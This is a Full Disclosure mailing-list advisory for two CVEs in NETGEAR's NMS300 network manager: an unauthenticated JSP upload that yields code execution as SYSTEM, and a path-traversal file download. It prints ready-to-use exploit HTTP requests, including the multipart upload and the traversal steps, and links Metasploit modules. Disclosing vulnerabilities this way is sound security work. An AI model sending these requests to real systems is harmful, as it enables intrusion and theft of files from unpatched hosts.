Full Disclosure mailing list archives

By Date By Thread [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300 From: Pedro Ribeiro <pedrib () gmail com>

Date: Thu, 4 Feb 2016 08:04:01 +0800

Hi, CERT/CC has helped me disclose two vulnerabilities in NETGEAR's Pro"safe" Network Management System 300 [1]. Two classical bugs: one remote code execution via arbitrary file upload and an authenticated arbitrary file download. The full advisory can be seen in my repo at [2] and it is also pasted below. I've also released two Metasploit modules to exploit these vulnerabilities [3][4]. There is currently no fix for these - do not expose NMS300 to the Internet! I've decided to release the exploits anyway as CERT's advisory details how the vulnerability can be exploited. Regards, Pedro [1] https://www.kb.cert.org/vuls/id/777024 [2] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt [3] https://github.com/rapid7/metasploit-framework/pull/6530 [4] https://github.com/rapid7/metasploit-framework/pull/6531 Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 Discovered by Pedro Ribeiro (pedrib () gmail com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user. The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. Technical details: #1 Vulnerability: Remote code execution via arbitrary file upload (unauthenticated) CVE-2016-1525 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 There are two servlets that allow unauthenticated file uploads: @RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload @RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name" [name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World Example</title> </head> <body> <h2>A Hello World Example of JSP.</h2> </body> </html> ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3-- #2 Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000 Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r

"} c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=<ID> Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. References: [1] https://www.kb.cert.org/vuls/id/777024 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ Enabling secure digital business >> Attachment: signature.asc

Description: OpenPGP digital signature _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300 Pedro Ribeiro (Feb 03)